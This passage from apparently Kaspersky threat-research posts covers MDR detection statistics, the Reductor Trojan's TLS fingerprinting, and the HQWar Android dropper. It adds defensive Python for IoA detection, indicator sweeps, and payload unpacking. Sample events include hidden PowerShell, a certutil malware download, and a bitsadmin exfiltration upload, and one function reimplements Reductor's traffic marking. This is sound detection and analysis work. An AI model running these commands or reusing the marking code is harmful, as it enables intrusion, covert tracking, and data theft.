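    "sqlservr.exe", "sqlagent.exe", "nginx.exe", "java.exe", "w3wp.exe",  # server apps (JBoss/Tomcat run as java.exe)
}
SYSTEM_ACCOUNTS = {"nt authority\\system", "system"}
# certutil download switches followed by a URL anywhere later on the command line
CERTUTIL_DOWNLOAD = re.compile(r"-(urlcache|verifyctl)\b.*https?://", re.IGNORECASE)
# bitsadmin /transfer (upload or download) or the PowerShell cmdlet
BITS_TRANSFER = re.compile(r"\bbitsadmin(?:\.exe)?\s+/transfer\b|\bStart-BitsTransfer\b", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_ioas(event):
    """Return (technique id, description) for every IoA the event matches."""
    parent, image, cmd = basename(event.parent_image), basename(event.image), event.command_line
    hits = []
    if image in SCRIPT_HOSTS and parent in SPAWN_SENSITIVE_PARENTS:
        hits.append(("T1059", f"{parent} started script host {image}"))
    if image == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
        hits.append(("T1105", "certutil used to download a remote file"))
    if BITS_TRANSFER.search(cmd):
        hits.append(("T1197", "BITS job used to transfer a file"))
    if image == "whoami.exe" and event.user.lower() in SYSTEM_ACCOUNTS:
        hits.append(("T1033", "whoami run as SYSTEM"))
    return hits


def scan(events):
    """Alerts as (event index, hits); an analyst still decides which become incidents."""
    alerts = []
    for index, event in enumerate(events):
        hits = match_ioas(event)
        if hits:
            alerts.append((index, hits))
    return alerts


# Constructed sample events; the certutil line is the report's own example with a live URL.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c powershell -nop -w hidden -ep bypass -f C:\Users\Public\inv.ps1",
                 r"CORP\jdoe"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe",
                 "certutil -verifyctl -f -split https://example.com/wce.exe", r"CORP\jdoe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\bitsadmin.exe",
                 r"bitsadmin /transfer exfil /upload https://example.com/drop C:\Temp\dump.zip",
                 r"CORP\svc_backup"),
    ProcessEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\whoami.exe",
                 "whoami", r"NT AUTHORITY\SYSTEM"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir", r"CORP\jdoe"),  # benign: explorer launching cmd is not an IoA here
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        for technique, why in hits:
            print(f"event {index}: {technique} {why}")
```

The last event shows why the conversion rate from alerts to incidents is low in practice: every rule here is one environment-specific list away from firing on an administrator, which is the baseline problem the report returns to later.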
MTTR in view of incident severity

The incident processing time depends slightly on severity: incidents with a higher degree of severity require more complex analysis. They also require more advanced remediation measures to cure infected systems and to protect against reoccurrence or threat propagation inside the network infrastructure than incidents with medium and low severity levels.

The MTTR values for incidents of different severity are provided below.

Incident prioritization

Incident severity is evaluated by experts based on a combination of factors, such as threat actor, attack stage at the time of incident detection (e.g. cyber kill chain), the scale of affected infrastructure, details about the threat and how it may be relevant to a customer’s business and, with the customer’s feedback, the identified impact on infrastructure, complexity of remediation measures and more. The severity levels are described below.

Incident details                                      Severity level  Typical remediation measures              Action (customer side)
Traces of targeted attack, unknown threat, complex    High            Further investigation using digital       Urgent action from the technical specialists
malware or malware with fewer malicious actions.                      forensic methods and manual remediation   of the targeted organization is required:
                                                                                                                incident response
New malware samples (Trojan, Cryptor, etc.) for       Medium          Malware analysis; removal with EPP        None (affected systems efficiently cured by EPP)
which automatic remediation by product is
technically possible. Associated with minor damage
to the affected systems.
New samples of potentially unwanted programs          Low             Removal with EPP                          None (affected systems efficiently cured by EPP)
bringing inconvenience (Adware, Riskware,
not-a-virus, etc.) for which automatic remediation
by product is technically possible. Associated with
no damage to the affected systems.

In the first half of 2019, we identified the following severity levels by month.

Things to note

Almost all incidents that have medium or low severity are connected to threats that can be efficiently remediated by endpoint protection products (EPP). No action from the side of the victim systems is required except for anti-malware database updates to EPPs to eliminate the risks associated with such incidents. This shows that an EPP is an effective threat response tool in the case of low and medium severity incidents, but it requires an additional level of TTP-based threat hunting, manual detection, and analysis to find new, unknown, or advanced threats.

Effectiveness of detection technologies

Incident distribution by event source (sensors)

  • Almost half of all incidents were detected through the analysis of malicious actions or objects detected during the advanced analysis of endpoint behavior using TTP-based threat detection logic (using IoAs). This demonstrates the general efficiency of the endpoint IoA approach in detecting advanced threats and sophisticated malware-less attacks.
  • About one-third of all incidents were detected through the analysis of suspicious objects by the Advanced Sandbox component, which is usually connected with fraudulent email attachments that belong to various spam and phishing attacks targeting organizations all over the world. Detailed information on spam and phishing attacks in Q1 2019 was published on May 15, 2019 on Securelist.
Statistics on incident severity level distributed by detection technology

Adversary tactics and techniques used in incidents

Kaspersky determines the adversary tactics and techniques related to alerts and cybersecurity incidents detected via TTP-based threat hunting (using IoAs) in accordance with MITRE’s globally accepted ATT&CK knowledge base.

Statistics on attack tactics used in incidents of different severity (high, medium, low) at the time of detection

The tactics are placed in Cyber Kill Chain order.

  • Cybersecurity incidents were detected for almost all existing attack tactics, which indicates that activity can be detected at all stages of a potential attack (the exception is the Exfiltration tactic, for which no detection logic was implemented in the MDR service).
  • Detection of different ATT&CK tactics shows the ability to detect threats in the ‘post-breach’ attack stage when the intruders had already obtained access to the targeted systems, or even network infrastructure and were in the process of achieving attack objectives.
  • The statistics show the great importance of post-breach scenario detection in threat hunting combined with the classical pre-breach approach mainly implemented in preventive security controls. The better the threat is able to imitate legitimate activity, the greater its chances of avoiding detection before the actual compromise, which is very common for advanced malware-less threats.
Things to note
  • The greatest number of attacks were found at the Execution, Defense evasion, Lateral movement and Impact stages. The tactics used during these stages are often considered the noisiest.
  • The significant number of Persistence detections demonstrates the importance of being able to detect this tactic’s techniques and procedures.
Effectiveness of MITRE ATT&CK in security operations

The technique conversion = # incidents associated with the technique / # alerts associated with the technique
The higher the conversion, the more alerts become cybersecurity incidents after analysis.

Technique frequency (among alerts generated via IoAs)

A large number of alerts associated with an attack technique generally results from its legitimate use in the analyzed infrastructure. This must be controlled properly, because it indicates potentially favorable conditions for conducting the corresponding attacks.

It is highly important to determine whether behavior is normal for a particular IT infrastructure.

  • Having a baseline for what is normal activity in your IT infrastructure (efficient situational awareness) will help reduce false alerts for legitimate activity and raise the effectiveness of threat detection operations.

Detailed information on attack technique statistics, including the telemetry required for detection of the corresponding cybersecurity incidents, is provided via a separate link.

Kaspersky MDR service description

Detection technologies

Endpoint behavior analysis combined with analysis of metadata gathered via endpoint protection products (used as sensors) is performed by means of:
  • TTP-based threat hunting (using IoAs)
  • SIEM rules for automatic events correlation (if a SIEM system is implemented in the IT infrastructure)
Other detection technologies:
  • Advanced Sandbox
  • Anti-Malware engine
  • Targeted Attack Analyzer
  • Network Traffic Analyzer (includes IDS)
  • YARA engine
  • Manual detection
  • Customer requests

Monitoring process

Real-time monitoring of network traffic combined with object sandboxing and endpoint behavior analysis delivers a detailed insight into what is happening across a business’s IT infrastructure. According to the global threat landscape and the use of TTP-based threat detection logic (using IoAs), correlation of events from multiple layers of IT infrastructure, including networks and endpoints, enables “near real-time” detection of complex threats as well as retrospective investigations.

3 October 2019

COMpfun successor Reductor infects files on the fly to compromise TLS traffic

In April 2019, we discovered new malware that compromises encrypted web communications in an impressive way. Analysis of the malware allowed us to confirm that the operators have some control over the target’s network channel and could replace legitimate installers with infected ones on the fly. That places the actor in a very exclusive club, with capabilities that few other actors in the world have.

We called these new modules ‘Reductor’ after a .pdb path left in some samples. Besides typical RAT functions such as uploading, downloading and executing files, Reductor’s authors put a lot of effort into manipulating digital certificates and marking outbound TLS traffic with unique host-related identifiers.

The Kaspersky Attribution Engine shows strong code similarities between this family and the COMpfun Trojan. Moreover, further research showed that the original COMpfun Trojan is most probably used as a downloader in one of the distribution schemes. Based on these similarities, we’re quite sure the new malware was developed by the COMpfun authors.

The COMpfun malware was initially documented by G-DATA in 2014. Although G-DATA didn’t identify which actor was using this malware, Kaspersky tentatively linked it to the Turla APT, based on the victimology. Our telemetry indicates that the current campaign using Reductor started at the end of April 2019 and remained active at the time of writing (August 2019). We identified targets in Russia, Kazakhstan and Belarus.

We registered two initial infection schemes: Reductor spreads either by infecting popular software distributions (Internet Download Manager, WinRAR, etc. and, for at least one victim, through a popular warez website over HTTP), or its decryptor/dropper is spread using COMpfun’s ability to download files on already infected hosts.

How to mark the TLS handshake without even touching the traffic

The malware adds digital certificates from its data section to the target host and allows the operators to add additional certificates remotely through a named pipe. The solution that Reductor’s developers found to mark TLS traffic is the most ingenious part. They don’t touch the network packets at all; instead developers analyzed the Firefox source code and Chrome binary code to patch the corresponding pseudo random number generation (PRNG) functions in the process’s memory.

Browsers use PRNG to generate the ‘client random’ sequence for the network packet at the very beginning of the TLS handshake. Reductor adds encrypted unique hardware- and software-based identifiers for the victims to this ‘client random’ field. In order to patch the system’s PRNG functions, the developers used a small embedded Intel instruction length disassembler.

In order to patch browser PRNG memory functions and add unique user IDs into the TLS handshake, the developers of Reductor had to analyze Firefox and Chrome code

Why we believe on-the-fly infection took place

As we don’t know what happens on the ‘server’ side, we can only rely on ‘client’ analysis. In order to distinguish handshakes of interest from all the other TLS traffic, the campaign operators first have to decrypt the ‘client random’ field of the ‘client hello’. This means the campaign operators somehow need to have access to the target’s traffic.

The Reductor malware does not carry out a man-in-the-middle (MitM) attack itself. However, our initial thought was that the installed certificates may facilitate MitM attacks on TLS traffic; and the ‘client random’ field, with the unique ID in the handshake, would identify the traffic of interest. Later analysis provided even more basis for this idea.

We initially observed that infected installers were downloaded from HTTPS warez websites; but, as often happens, the files themselves were downloaded through unencrypted HTTP. This makes it technically possible to replace the files with malicious ones during the download process. Interestingly, the configuration data of some samples contained very popular legitimate websites. We really don’t think they were compromised to serve as control servers.

In any case, we didn’t initially know how the installers were infected, because the original downloaded files were no longer available for analysis on the warez websites. And there was always the possibility that the installers were infected on the website from which they were originally downloaded.

Then more recent Reductor telemetry gave us a clue. This time samples were again being downloaded from warez websites, but we were able to confirm that in this new case the original installers were not infected. This allowed us to confirm that Reductor’s operators have some control over the target’s network channel and could replace legitimate installers with infected ones on the fly.

Reductor features

The malware authors are creative and sometimes even seem to be having a bit of fun. For instance, one of the web domains they use for COMpfun (the publicly known name) is compfun[.]net. The domain-user-password triad hardcoded into the decryptor-dropper was “uac is useless”. Here’s a summary of the different types of campaign artifacts found:

                  Initial infection                               Escalation, detection avoidance                        Main payload
Malware           COMpfun Trojan                                  Reductor dropper-decryptor                             Reductor Trojan
Process           One of the browsers                             Same browser                                           lsass.exe
Persistence       COM CLSID hijacking                             Auxiliary module, N/A                                  LSA notification package
Net encryption    AES 128                                         Local module, N/A                                      AES 128
Host encryption   Configuration data encrypted with one-byte      Reductor in resources encrypted with one-byte XOR      Victims’ unique IDs in TLS ‘client hello’
                  XOR and compressed with LZNT1                   and compressed with LZNT1                              encrypted using XOR with changing round key

As we have already mentioned, there are two different methods used by the attackers to spread Reductor. In the first scenario, the attackers use infected software installers with 32- and 64-bit versions of Reductor included. These installers may be for popular Internet Download Manager, Office Activator, etc.

In the second scenario, the targets are already infected with the COMpfun Trojan, which uses COM CLSID for persistence. After getting into the browser’s address space, the Trojan can receive the command to download additional modules from the C2. As a result, the target’s browser downloaded Reductor’s custom dropper-decryptor.

The coding style is quite distinctive throughout the modules. Take a look at them in the following table:

Feature                               Description
Strings storage                       All the strings in use, such as function names for resolving dynamic addresses, are returned by small functions. The developers probably implemented them using the C preprocessor #define directive.
Function address dynamic resolution   For every dynamically linked library in use, the developers implemented a standalone function and a custom structure to store the addresses of its functions for further use.
Extensive use of custom structures    The developers used custom structures for every task: C2 communication, thread synchronization, resolving of system function addresses, etc.

System fingerprinting hashes inside TLS ‘client random’

As mentioned above, Reductor adds its own ‘victim id’ inside TLS packets. The first four-byte hash (cert_hash) is built using all of Reductor’s digital certificates. For each of them, the hash’s initial value is the X509 version number. Then they are sequentially XORed with all four-byte values from the serial number. All the counted hashes are XOR-ed with each other to build the final one. The operators know this value for every victim, because it’s built using their digital certificates.

The second four-byte hash (hwid_hash) is based on the target’s hardware properties: SMBIOS date and version, Video BIOS date and version and hard drive volume ID. The operators know this value for every victim because it’s used for the C2 communication protocol. The resulting custom 16-byte structure to spoof the originally PRNG-generated values looks like this:

struct client_hello_system_fingerprint {
    DWORD initial_xor_key;   // First four bytes generated by original system PRNG function
    DWORD predefined_const;  // Set to 0x45F2837D
    DWORD cert_hash;         // Reductor's digital certificates hash
    DWORD hwid_hash;         // Target's hardware hash
};

The latter three fields are encrypted using the first four bytes – initial PRN XOR key. At every round, the XOR key changes with the MUL 0x48C27395 MOD 0x7FFFFFFF algorithm. As a result, the bytes remain pseudo random, but with the unique host ID encrypted inside.
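The marking scheme above is simple enough to reproduce, and reproducing it gives a defender a check: because the client random travels in clear in the ClientHello, a passive sensor can XOR the second DWORD with the first and test for 0x45F2837D. The example below is written from the article’s description and is not Reductor’s code. Assumptions: DWORDs are little-endian, the 16-byte structure occupies the first 16 bytes of the 32-byte client random, each round key is used once and then advanced, the remaining 16 bytes are left as the PRNG produced them, and a certificate serial is consumed as little-endian 4-byte words with the trailing partial word zero-padded; the ‘seventh byte set to 1’ detail from the NSS patch is not modelled.

```python
"""Encode and detect Reductor's host fingerprint in a TLS client random.

Added example written from the article's description; it is not Reductor's
code. Assumptions: DWORDs are little-endian, the 16-byte structure sits in the
first 16 bytes of the 32-byte client random, each round key is used once and
then advanced, the other 16 bytes stay as the PRNG produced them, and the
certificate serial is consumed as little-endian 4-byte words with the trailing
partial word zero-padded. The "seventh byte set to 1" detail from the NSS patch
table is not modelled.
"""
import os
import struct

PREDEFINED_CONST = 0x45F2837D
LCG_MUL, LCG_MOD = 0x48C27395, 0x7FFFFFFF


def next_key(key):
    """Round-key update the article gives as MUL 0x48C27395 MOD 0x7FFFFFFF."""
    return (key * LCG_MUL) % LCG_MOD


def cert_hash(certs):
    """cert_hash over (x509_version, serial_bytes) pairs, following the article's recipe:
    start from the version number, XOR in every 4-byte word of the serial, then XOR the
    per-certificate results together."""
    total = 0
    for version, serial in certs:
        h = version
        padded = serial + b"\x00" * (-len(serial) % 4)  # assumption: zero-pad a partial word
        for (word,) in struct.iter_unpack("<I", padded):
            h ^= word
        total ^= h
    return total


def mark_client_random(prng_bytes, cert_h, hwid_h):
    """What the patched PRNG hands back instead of 32 clean random bytes."""
    assert len(prng_bytes) == 32
    key = struct.unpack("<I", prng_bytes[:4])[0]  # initial_xor_key: genuinely random
    words = [key]
    for field in (PREDEFINED_CONST, cert_h, hwid_h):
        words.append(field ^ key)
        key = next_key(key)
    return struct.pack("<4I", *words) + prng_bytes[16:]


def extract_fingerprint(client_random):
    """Return (cert_hash, hwid_hash) when the marker decrypts, else None.

    This is the check a passive sensor can run on every ClientHello: the client
    random is sent in clear, and a clean one matches by chance only with
    probability 2**-32.
    """
    if len(client_random) != 32:
        return None
    key, c1, c2, c3 = struct.unpack("<4I", client_random[:16])
    if (c1 ^ key) != PREDEFINED_CONST:
        return None
    key = next_key(key)
    cert_h = c2 ^ key
    key = next_key(key)
    return cert_h, c3 ^ key


def is_marked(client_random):
    return extract_fingerprint(client_random) is not None


if __name__ == "__main__":
    # constructed inputs: one certificate with version 2 (X509v3) and a short serial
    ch = cert_hash([(2, bytes.fromhex("0100000000000000"))])
    marked = mark_client_random(os.urandom(32), ch, 0x1234ABCD)
    print(marked.hex(), extract_fingerprint(marked))
```

Run over the client randoms of captured ClientHello messages, extract_fingerprint() both flags marked hosts and recovers the cert and hardware hashes the operators use to pick traffic of interest; a match on the constant alone is the cheap first filter, since the recovered hashes cannot be validated without the certificates and hardware data of the host.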

PRNG patching

The table below enumerates the patched auxiliary and PRNG system functions.

Library                                Patched function             Features
Auxiliary functions
“ntdll.dll”                            RtlReleaseResource()         Save auxiliary data such as the current thread ID and current tick count
“ntdll.dll”                            memcpy()                     If the “client hello” has to be copied, compute cert_hash and hwid_hash, replace the source bytes with the encrypted client_hello_system_fingerprint structure and call the original memcpy()
One of the C runtime libraries         time64()                     Save the time elapsed since 1 January 1970
“kernel32.dll” or “kernelbase.dll”     GetSystemTimeAsFileTime()    Save the current system time
PRNG functions
“nss3.dll”                             PK11_GenerateRandom()        Call the original PRNG function and generate the initial XOR key from its result. Change the PRNG result: set the seventh byte to 1, then store 0x45F2837D and the hwid and cert hashes. Encrypt the result and return it instead of the original PRN. This affects calls to ssl3_SendClientHello() -> ssl3_GetNewRandom(ss->ssl3.hs.client_random)
“advapi32.dll”                         CryptGenRandom()             Spoof the system PRNG result in a similar way, with some minor changes
“bcrypt.dll”                           BCryptGenRandom()            Spoof the system PRNG result in a similar way, with some minor changes
“chrome.dll”                           PRNG function                Find the PRNG function by its binary code template and patch it like all the aforementioned

Firefox nss3.dll PK11_GenerateRandom() patching

Reductor patches nss3.dll for Firefox. This library’s source code is publicly available: PK11_GenerateRandom() is called from ssl3_GetNewRandom() in /security/nss/lib/ssl/ssl3con.c. The SSL3_RANDOM_LENGTH constant is 32 bytes, so Reductor’s code changes the whole result, and the functions that call ssl3_GetNewRandom() receive modified random data with the encrypted target fingerprint inside.

In this case, the caller function to ssl3_GetNewRandom(ss->ssl3.hs.client_random) is ssl3_SendClientHello() in order to generate the client random data for the initial communication handshake.

To affect the TLS handshake malware authors patched PK11_GenerateRandom() inside the Firefox process memory

Patching PK11_GenerateRandom() would also affect any other 256-bit (32-byte) random value generated through it, for example the initialization vector (IV) for AES 256 in ssl_SelfEncryptProtect() or other crypto functions in the NSS libraries used by Firefox. From our point of view, this is a side effect of Reductor with no additional purpose.

Installed digital certificates

Reductor samples hold DER-encoded root X509v3 certificates in the .data section to add on the target hosts. The malware is also able to get additional certificates from the operators through a named pipe.

Certificate SHA1 fingerprint               CA for root cert   Valid till (GMT)
119B2BE9C17D8C7C5AB0FA1A17AAF69082BAB21D   ie-paypal          2031.11.17 22:56:10
546F7A565920AEB0021A1D05525FF0B3DF51D020   GeoTrust Rsa CA    2031.11.17 22:56:10
959EB6C7F45B7C5C761D5B758E65D9EF7EA20CF3   GeoTrust Rsa CA    2031.11.17 22:56:10
992BACE0BC815E43626D59D790CEF50907C6EA9B   VeriSign, Inc.     2031.11.17 22:56:10

One of the decoded CA X509v3 certificates inside the Reductor malware

C2 communication

All C2 communications are handled in a standalone malware thread. Reductor sends HTTP POST queries to the /query.php scripts on the C2s listed in its configuration. The POST query contains the target’s unique hardware ID encrypted with AES 128. The C2 returns one of the following encrypted commands.

C2 command | Features
--- | ---
hostinfo | Get the host name
gettimeout | Get the timeout value from the corresponding registry value
options | Parse strings and set corresponding values in the system registries. So far only one option is supported – timeout
domainlist | Transmit the current C2 domains used by target
downfile | Download the file of interest
upfile | Upload the file of interest
execfile | Create the process that executes mentioned file
nop | Do nothing. Possibly used to check the connection with the host
kill | Delete installed digital certificates, files, cookies and system registry values including those related to COM CLSID or LSA notification package persistence
deletefile | Delete file at a specified path
certlist | Renew the digital certificates installed on target

Conclusions

Turla has in the past shown many innovative ways to accomplish its goals, such as using hijacked satellite infrastructure[2]. This time, if we’re right that Turla is the actor behind this new wave of attacks, then with Reductor it has implemented a very interesting way to mark a host’s encrypted TLS traffic by patching the browser without parsing network packets. The victimology for this new campaign aligns with previous Turla interests.

We didn’t observe any MitM functionality in the analyzed malware samples. However, Reductor is able to install digital certificates and mark the targets’ TLS traffic. It uses infected installers for initial infection through HTTP downloads from warez websites. The fact that the original files on these sites are not infected also points to subsequent traffic manipulation.

File Hashes
  • 27CE434AD1E240075C48A51722F8E87F
  • 4E02B1B1D32E23975F496D1D1E0EB7A6
  • 518AB503808E747C5D0DDE6BFB54B95A
  • 7911F8D717DC9D7A78D99E687A12D7AD
  • 9C7E50E7CE36C1B7D8CA2AF2082F4CD5
  • A0387665FE7E006B5233C66F6BD5BB9D
  • F6CAA1BFCCA872F0CBE2E7346B006AB4
Domains and IPs
  • adstat.pw
  • bill-tat.pw
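The C2 description above (HTTP POST to /query.php on the configured domains) and the indicator lists translate directly into two retrospective checks a defender can run: a proxy-log sweep and a root-store fingerprint comparison. The code below is an added example written for this post, not part of the original article or any Kaspersky tool. The domains and certificate SHA1 fingerprints are the ones published above; the proxy log format and the four log lines are constructed for the example and are an assumption about how a given proxy writes its records.

```python
import hashlib
import re
from urllib.parse import urlsplit

# Indicators as published in the report: C2 domains and SHA1 fingerprints of the
# root certificates Reductor installs.
REDUCTOR_DOMAINS = {"adstat.pw", "bill-tat.pw"}
REDUCTOR_CERT_SHA1 = {
    "119B2BE9C17D8C7C5AB0FA1A17AAF69082BAB21D",
    "546F7A565920AEB0021A1D05525FF0B3DF51D020",
    "959EB6C7F45B7C5C761D5B758E65D9EF7EA20CF3",
    "992BACE0BC815E43626D59D790CEF50907C6EA9B",
}
C2_PATH = "/query.php"

# Assumed proxy log layout: "<timestamp> <client_ip> <method> <url> <status>"
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    "2019-10-01T12:00:01Z 10.0.0.5 GET http://example.com/index.html 200",
    "2019-10-01T12:00:07Z 10.0.0.5 POST http://adstat.pw/query.php 200",
    "2019-10-01T12:00:09Z 10.0.0.7 GET http://bill-tat.pw/ 404",
    "2019-10-01T12:00:15Z 10.0.0.9 POST http://intranet.example.com/query.php 200",
]


def classify_request(line: str):
    """Score one proxy log line against the Reductor C2 pattern.

    high:   POST /query.php to a known C2 domain (beacon shape + indicator)
    medium: any request to a known C2 domain
    low:    POST /query.php elsewhere; the path alone is a weak, noisy signal
    None:   nothing of interest, or the line does not match the log layout
    """
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m["url"])
    host = (url.hostname or "").lower()
    domain_hit = host in REDUCTOR_DOMAINS
    beacon_shape = m["method"] == "POST" and url.path == C2_PATH
    if domain_hit and beacon_shape:
        severity = "high"
    elif domain_hit:
        severity = "medium"
    elif beacon_shape:
        severity = "low"
    else:
        return None
    return {"ts": m["ts"], "client": m["client"], "host": host, "severity": severity}


def scan_proxy_log(lines):
    """Return every hit in order of appearance, so each client can be triaged."""
    return [hit for hit in (classify_request(ln) for ln in lines) if hit]


def sha1_fingerprint(der_cert: bytes) -> str:
    """SHA1 fingerprint in the same upper-case hex form as the table above."""
    return hashlib.sha1(der_cert).hexdigest().upper()


def is_reductor_cert(der_cert: bytes) -> bool:
    """True if a DER-encoded certificate exported from a root store matches an indicator."""
    return sha1_fingerprint(der_cert) in REDUCTOR_CERT_SHA1
```

Export the machine's root store as DER files (for example with certutil on Windows) and feed each file's bytes to is_reductor_cert(); for the proxy sweep, iterate the real log and review "high" hits first.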
2 October 2019

HQWar: the higher it flies, the harder it drops

Mobile dropper Trojans are one of today’s most rapidly growing classes of malware. In Q1 2019, droppers held second or third position in terms of share of total detected threats, after holding nearly half of all Top 20 places in 2018. Since the droppers’ main task is to deliver a payload while sidestepping protective barriers, and their developers are fully bent on countering detection, this is probably one of the most dangerous classes of malware.

One of the most dangerous and widely spread families of Trojan droppers is Trojan-Dropper.AndroidOS.Hqwar. Originally created as a MaaS infrastructure, today Hqwar is used for both small-scale attacks and big ones affecting thousands of users all over the world.

The very first versions of Hqwar saw the light in early 2016, getting quite popular by the end of the same year. It peaked in Q3 2018, when substantial numbers of financial malware payloads would come “packaged” with this dropper. Yet, beginning in Q4 2018, we have observed its decline. The likely reason is that the tool is not updated frequently enough by its author, causing a customer outflow.

Number of Hqwar detections by unique users

The very first Trojan packed with Hqwar was a piece of ransomware targeting Russian users. This is how this disgrace introduced itself to the victims, impersonating the Ministry of Internal Affairs (note that Hqwar was built by a Russian-speaking author, and many of its clients prey on Russian users):

Now one can say that only the lazy did not use Hqwar: Kaspersky’s collection of viruses features over 200,000 Trojans packed using Hqwar. When decrypting and unpacking these malicious objects, we found that almost 80% of them are financial threats, while nearly one third represent the banking Trojan family of Faketoken. In fact, it was the first ever banking Trojan whose authors began using Hqwar.

The Top 10 list of payloads most often bundled with Hqwar features such widely distributed Trojans as Asacub, Marcher and Svpeng. On several occasions, the dropper was carrying Korean bankers of the Wroba family and such famous SMS Trojans as Opfake and Fakeinst. But their authors seem to have used Hqwar just to try things out, so to speak: these “matryoshkas” did not gain much popularity. All in all, we know of 22 families of different Trojans packed with Hqwar, which shows how much interest cybercriminals take in droppers.

# | Family | %*
--- | --- | ---
1 | HEUR:Trojan-Banker.AndroidOS.Faketoken | 28.81%
2 | HEUR:Trojan.AndroidOS.Boogr | 14.53%
3 | HEUR:Trojan-Banker.AndroidOS.Asacub | 10.10%
4 | HEUR:Trojan-Banker.AndroidOS.Marcher | 8.44%
5 | HEUR:Trojan-Banker.AndroidOS.Grapereh | 7.67%
6 | HEUR:Trojan-Spy.AndroidOS.SmsThief | 7.20%
7 | HEUR:Trojan-Banker.AndroidOS.Gugi | 6.18%
8 | HEUR:Trojan-Banker.AndroidOS.Svpeng | 5.38%
9 | HEUR:Trojan-Banker.AndroidOS.Agent | 5.24%
10 | HEUR:Trojan-Banker.AndroidOS.Palp | 1.97%

* percentage of all unpacked objects

What’s inside

From the technical viewpoint, the dropper is a wrapper around the payload’s DEX file to be decrypted and loaded, comprising two classes.

Decompiled dropper with two classes

If we are to simplify and forget about obfuscation, the dropper’s workflow can be presented as follows:

  • open a file from assets;
  • decrypt it using RC4 and a hardwired key;
  • delegate control with the help of DexClassLoader.loadClass().

Everything the unpacked Trojan needs to operate is in the dropper’s APK file: all activity, receiver and service records are written down in the manifest, the pictures are where they should be (with unique names generated for all objects). As Hqwar doesn’t “drop” the APK file but only loads the code, there is no need for an app installation request which can potentially be declined by the user (however, this approach is not exactly good for persistence: once the dropper is deleted by the user, the Trojan is deleted, too). The main Trojan’s body is obfuscated, so the original malware cannot be recognized.
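The three-step workflow above (asset file, RC4 with a hardwired key, DexClassLoader) is what an analyst has to reverse to get at the packed payload for classification. The unpacker below is an added example for this post, not code from the original article or from Kaspersky’s unpacking pipeline: it implements RC4 from scratch, decrypts an asset blob, and validates the result by its DEX magic before handing it to further analysis. The key and the fake DEX header are constructed for the example; the real Hqwar keys are not on this page and would be recovered from the dropper’s decompiled class.

```python
DEX_MAGIC_PREFIX = b"dex\n"   # followed by a three-digit version and a NUL, e.g. "035\0"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                                  # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                     # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def looks_like_dex(data: bytes) -> bool:
    """Check the 8-byte DEX magic: 'dex\\n' + three ASCII digits + NUL."""
    return (len(data) >= 8 and data[:4] == DEX_MAGIC_PREFIX
            and data[4:7].isdigit() and data[7] == 0)


def unpack_asset(encrypted: bytes, key: bytes) -> bytes:
    """Decrypt one asset file with a known key and insist on a DEX result."""
    plain = rc4(key, encrypted)
    if not looks_like_dex(plain):
        raise ValueError("decrypted data is not a DEX file: wrong key or a different packer")
    return plain


def try_keys(encrypted: bytes, candidate_keys):
    """Try each key collected from known dropper variants; return (key, dex) or (None, None).

    The DEX magic check is what makes brute-forcing a short key list safe:
    a wrong key produces pseudo-random bytes that will not carry the magic.
    """
    for key in candidate_keys:
        plain = rc4(key, encrypted)
        if looks_like_dex(plain):
            return key, plain
    return None, None


# Constructed sample: a fake DEX header encrypted with a made-up key (not Hqwar's real key).
SAMPLE_KEY = b"sample-key-not-real"
SAMPLE_DEX = b"dex\n035\x00" + bytes(24) + b"...payload classes..."
SAMPLE_ASSET = rc4(SAMPLE_KEY, SAMPLE_DEX)
```

In practice the encrypted blob is read from the APK's assets directory and the decrypted DEX goes straight to a decompiler, which is where the obfuscated payload family gets identified.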

Interesting fact: for some time Hqwar had co-existed with a Trojan called Trojan-SMS.AndroidOS.Fakeinst.hq, with which it had quite a few things in common:

  • The two used similar string obfuscation methods (it might be that the authors of both had used a ready-made decryption algorithm).

A portion of string decryption code from Hqwar (left) and Fakeinst.hq (right)

  • A setup was used in which a portion of code was loaded from AES-encrypted asset files. It is worth noting that in Fakeinst.hq one of the encrypted files was an APK file, while the other one was a DEX file used to install a secondary APK (payload). This made for a triple matryoshka: the original dropper at level one, an encrypted DEX file at level two, and an encrypted APK at three. This was done to preserve infection after the dropper itself was deleted. Broadly speaking, the trick is not new, but unlike other similar occasions, Hqwar and Fakeinst.hq used encrypted files with the same extension – DAT.

Encrypted files in Fakeinst.hq

Encrypted file from Hqwar

  • In both cases, a similar certificate generation pattern was used:

Certificate from Fakeinst.hq

Certificate from Hqwar

This evidence proves nothing, of course. But it can be assumed that the author of Hqwar had begun with Russian SMS Trojans, while at the same time working on the “wrapper” infrastructure.


Hqwar owes its popularity to convenient infrastructure and pricing policy (as well as the fact that its maker is still at large and has no fear of being called to account for his actions).

Advertisement of the service

An API exists to have the malware mass-produced. It is likely used by the makers of Trojans like Faketoken, Asacub, Marcher, etc.:

The need to have a certificate for each APK file is one of the places where one could gain “a foothold” in Hqwar by reconstructing the certificate generation system. Therefore, the author has made it possible to load an arbitrary certificate – either stolen or taken from a legitimate application.


